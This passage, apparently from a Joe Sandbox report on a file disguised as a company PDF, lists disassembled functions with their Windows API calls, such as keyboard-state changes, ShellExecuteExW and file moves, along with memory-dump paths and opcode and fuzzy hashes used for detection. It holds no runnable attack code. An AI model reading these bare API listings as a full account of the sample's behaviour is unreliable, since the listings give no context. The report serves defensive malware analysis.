                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007B73B6
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 007B73D2
                                                                                                                      • _memmove.LIBCMT ref: 007B7420
                                                                                                                      • _memmove.LIBCMT ref: 007B743D
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 007B744C
                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007B7461
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 007B7480
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 256516436-0
                                                                                                                      • Opcode ID: aed889da7db24822b238f76e239ae2d71b7e3db4188839a268b790e0ce6fa8e6
                                                                                                                      • Instruction ID: 547e32df96fd83a2cc71325893630d6dbbb6a5bb2fd08a8a80b8d2e1fa1f0744
                                                                                                                      • Opcode Fuzzy Hash: aed889da7db24822b238f76e239ae2d71b7e3db4188839a268b790e0ce6fa8e6
                                                                                                                      • Instruction Fuzzy Hash: A5318131A04205EFCF10DF64DC89AAE7BB8FF44750B1481B5F904AB246DB38AA10CBA4
                                                                                                                      Function 007D6442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 007D645A
                                                                                                                      • GetDC.USER32(00000000), ref: 007D6462
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007D646D
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 007D6479
                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007D64B5
                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007D64C6
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007D9299,?,?,000000FF,00000000,?,000000FF,?), ref: 007D6500
                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007D6520
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3864802216-0
                                                                                                                      • Opcode ID: 92d28c543611774fbcb759cbd4579a0ddf5ee1317a4fa310d09a4eae21c26190
                                                                                                                      • Instruction ID: d388af3af94e1df42a36c7f5796f4a7620b805edb7aff684d06e87e1e425ed65
                                                                                                                      • Opcode Fuzzy Hash: 92d28c543611774fbcb759cbd4579a0ddf5ee1317a4fa310d09a4eae21c26190
                                                                                                                      • Instruction Fuzzy Hash: D3316F72101214BFEB118F50DC49FEA3FB9EF09761F048066FE099A291D6799951CB64
                                                                                                                      Function 007AC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2931989736-0
                                                                                                                      • Opcode ID: 86707ce4d080c0f3bc62350a7ab461d464fb6824ed770019e068269007fcc534
                                                                                                                      • Instruction ID: f442e2df0aa68c1bb0f992da120189469706a3d4b87b226f3d259533f45d0a30
                                                                                                                      • Opcode Fuzzy Hash: 86707ce4d080c0f3bc62350a7ab461d464fb6824ed770019e068269007fcc534
                                                                                                                      • Instruction Fuzzy Hash: 1921F8B1701309F7D612A9258C46FBB235D9F963D4B444120FE09D6293EB1DED11C2A1
                                                                                                                      Function 007BED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                                                                                                                        • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                                                                                                                        • Part of subcall function 0076FEC6: _wcscpy.LIBCMT ref: 0076FEE9
                                                                                                                      • _wcstok.LIBCMT ref: 007BEEFF
                                                                                                                      • _wcscpy.LIBCMT ref: 007BEF8E
                                                                                                                      • _memset.LIBCMT ref: 007BEFC1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                      • String ID: X
                                                                                                                      • API String ID: 774024439-3081909835
                                                                                                                      • Opcode ID: be8a60fe2187eae7f853dcc2c5782c4a1e24cfd69c078d5c801664a02ed43c2c
                                                                                                                      • Instruction ID: 04f8f87d00c0e08b722bef7eeaf02cdbcd8e04ba1eefe7f22423605d5788fd6e
                                                                                                                      • Opcode Fuzzy Hash: be8a60fe2187eae7f853dcc2c5782c4a1e24cfd69c078d5c801664a02ed43c2c
                                                                                                                      • Instruction Fuzzy Hash: 21C17071508300DFC754EF24D889A9AB7E4FF84710F04892DF999972A2DB78ED49CB92
                                                                                                                      Function 00751424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: dc4b4ce903d1bf9de870519332695976d561d90ad8908a551b4662ab4b683cad
                                                                                                                      • Instruction ID: 08fea1eaa82a15c14b3cd77a00d6552a5e21246a667dbfb26e67460526783b29
                                                                                                                      • Opcode Fuzzy Hash: dc4b4ce903d1bf9de870519332695976d561d90ad8908a551b4662ab4b683cad
                                                                                                                      • Instruction Fuzzy Hash: FB717930900109EFCB04DF98CC89AFEBB79FF85312F648159F915AA251C778AA15CBA4
                                                                                                                      Function 007C6E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 368825190d9a0df28185bc12c79bf00356bf3d0fb2c18a486a4d0b44c2e741ce
                                                                                                                      • Instruction ID: 3315f51f71540f2b16c1fcb5bd7b72ebf07627f4f9a96a8f4fad50c9cd66edb2
                                                                                                                      • Opcode Fuzzy Hash: 368825190d9a0df28185bc12c79bf00356bf3d0fb2c18a486a4d0b44c2e741ce
                                                                                                                      • Instruction Fuzzy Hash: C761C171508300EBC714EB24CC8AFAFB7E9AF84714F54891DF94697292DB78AD44CB92
                                                                                                                      Function 007DB60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsWindow.USER32(019059A0), ref: 007DB6A5
                                                                                                                      • IsWindowEnabled.USER32(019059A0), ref: 007DB6B1
                                                                                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007DB795
                                                                                                                      • SendMessageW.USER32(019059A0,000000B0,?,?), ref: 007DB7CC
                                                                                                                      • IsDlgButtonChecked.USER32(?,?), ref: 007DB809
                                                                                                                      • GetWindowLongW.USER32(019059A0,000000EC), ref: 007DB82B
                                                                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007DB843
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4072528602-0
                                                                                                                      • Opcode ID: 93ac5ede1f88da1239b66cc48851c85bb79af636e48db82554fcd5bfe63860a7
                                                                                                                      • Instruction ID: e3dce9c4ed1d254544f0a7d8d56a155d4f811b02405ac5bbeea7368737c5a25b
                                                                                                                      • Opcode Fuzzy Hash: 93ac5ede1f88da1239b66cc48851c85bb79af636e48db82554fcd5bfe63860a7
                                                                                                                      • Instruction Fuzzy Hash: 1F718B34601204EFDB219F64C894FBA7BB9FF49310F1A446BE986973A1C739E851CB54
                                                                                                                      Function 007CF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 007CF75C
                                                                                                                      • _memset.LIBCMT ref: 007CF825
                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 007CF86A
                                                                                                                        • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                                                                                                                        • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                                                                                                                        • Part of subcall function 0076FEC6: _wcscpy.LIBCMT ref: 0076FEE9
                                                                                                                      • GetProcessId.KERNEL32(00000000), ref: 007CF8E1
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 007CF910
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 3522835683-2766056989
                                                                                                                      • Opcode ID: 0d5d4cb786a4185fb3152c0befff71448981c41a8c60c12a4b46647b4ff42444
                                                                                                                      • Instruction ID: 85e6c23cc82a7fcb866cb95b9c3ff9431b4f96f52857aa0b1fa4b3926a90d6b5
                                                                                                                      • Opcode Fuzzy Hash: 0d5d4cb786a4185fb3152c0befff71448981c41a8c60c12a4b46647b4ff42444
                                                                                                                      • Instruction Fuzzy Hash: 75619C75A00619DFCF14EF64C484AAEBBF6FF48310B14846DE85AAB351CB79AD44CB90
                                                                                                                      Function 007B145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 007B149C
                                                                                                                      • GetKeyboardState.USER32(?), ref: 007B14B1
                                                                                                                      • SetKeyboardState.USER32(?), ref: 007B1512
                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 007B1540
                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 007B155F
                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 007B15A5
                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007B15C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 87235514-0
                                                                                                                      • Opcode ID: 4362735814fc2240f4c67b52c8a6f3840796f7b89b0e8e781370e469bb630c22
                                                                                                                      • Instruction ID: 5b77b59477580115de716d562704770bd8734c80b02b3b3333d2c7641269c389
                                                                                                                      • Opcode Fuzzy Hash: 4362735814fc2240f4c67b52c8a6f3840796f7b89b0e8e781370e469bb630c22
                                                                                                                      • Instruction Fuzzy Hash: 5151E2A0A047D53EFB3642348C69BFA7FA95F46304F8C8589E1D6468C2C69CEC94D750
                                                                                                                      Function 007B1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(00000000), ref: 007B12B5
                                                                                                                      • GetKeyboardState.USER32(?), ref: 007B12CA
                                                                                                                      • SetKeyboardState.USER32(?), ref: 007B132B
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007B1357
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007B1374
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007B13B8
                                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007B13D9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 87235514-0
                                                                                                                      • Opcode ID: f26a431a2fffe40a962dc39107a5ca58c410a4554c5db10f3f4187c2908e3ec8
                                                                                                                      • Instruction ID: 2572410b1f61a91d9c07ef1d5d459b07085f37cf65b2eb65085b3f56d681e335
                                                                                                                      • Opcode Fuzzy Hash: f26a431a2fffe40a962dc39107a5ca58c410a4554c5db10f3f4187c2908e3ec8
                                                                                                                      • Instruction Fuzzy Hash: 5951D3A0A046D57DFB3287248C65BFABFE96F06300FC88589E1D5878C2E799EC94D750
                                                                                                                      Function 007B589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsncpy$LocalTime
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2945705084-0
                                                                                                                      • Opcode ID: cde44621e81cad0f8017312c1454812c5935abbe2de65e1787ef29e44735efd6
                                                                                                                      • Instruction ID: 1acd9e7510033ccf0a469828b310e6b757d5a3fd38fe5b579e69fd71ac188baa
                                                                                                                      • Opcode Fuzzy Hash: cde44621e81cad0f8017312c1454812c5935abbe2de65e1787ef29e44735efd6
                                                                                                                      • Instruction Fuzzy Hash: 8F416165C20628B6CF10EBB4888EACF77A8AF05750F50C956E51CE3122F738E755C7A9
                                                                                                                      Function 007ADA5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007ADAC5
                                                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007ADAFB
                                                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007ADB0C
                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007ADB8E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                      • String ID: ,,~$DllGetClassObject
                                                                                                                      • API String ID: 753597075-463960871
                                                                                                                      • Opcode ID: e5f36c4e5f23f97eb729c99caede79efbb09d248fe1be38537a78ab9ed0b8fb3
                                                                                                                      • Instruction ID: 4a6f1f6f5cd0ec4484fd1fc4d9cf633d31f7cd440b9b86139ff6a12e8cfcb51d
                                                                                                                      • Opcode Fuzzy Hash: e5f36c4e5f23f97eb729c99caede79efbb09d248fe1be38537a78ab9ed0b8fb3
                                                                                                                      • Instruction Fuzzy Hash: 954194B1601208DFDB25CF54C884A9A7BB9EF89710F1582AEFD069F205D7B9DD40DBA0
                                                                                                                      Function 007B38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007B48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007B38D3,?), ref: 007B48C7
                                                                                                                        • Part of subcall function 007B48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007B38D3,?), ref: 007B48E0
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 007B38F3
                                                                                                                      • _wcscmp.LIBCMT ref: 007B390F
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 007B3927
                                                                                                                      • _wcscat.LIBCMT ref: 007B396F
                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 007B39DB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 1377345388-1173974218
                                                                                                                      • Opcode ID: 88a832c5c8efedfd193cf2e54747e4302f518242a0424cd9c6507a47f830579b
                                                                                                                      • Instruction ID: b51c955f2ca7fdc65c56485e9e639007f4312d8744aa05ad0c0dfd63b589a8c2
                                                                                                                      • Opcode Fuzzy Hash: 88a832c5c8efedfd193cf2e54747e4302f518242a0424cd9c6507a47f830579b
                                                                                                                      • Instruction Fuzzy Hash: 8541827240C3449ACB51EF64C485ADFB7E8AF88344F00492EF49AC3152EA7CE68DC752
                                                                                                                      Function 007D7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 007D7519
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D75C0
                                                                                                                      • IsMenu.USER32(?), ref: 007D75D8
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007D7620
                                                                                                                      • DrawMenuBar.USER32 ref: 007D7633
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3866635326-4108050209
                                                                                                                      • Opcode ID: a2bd5080baa42566bd7ba328d0e4aadc716f1187c9df78cd984929c7546a6250
                                                                                                                      • Instruction ID: ca5a0917ecdf7620021c71a220de3ccb246a32b5dda7d51c41470d99e71405a8
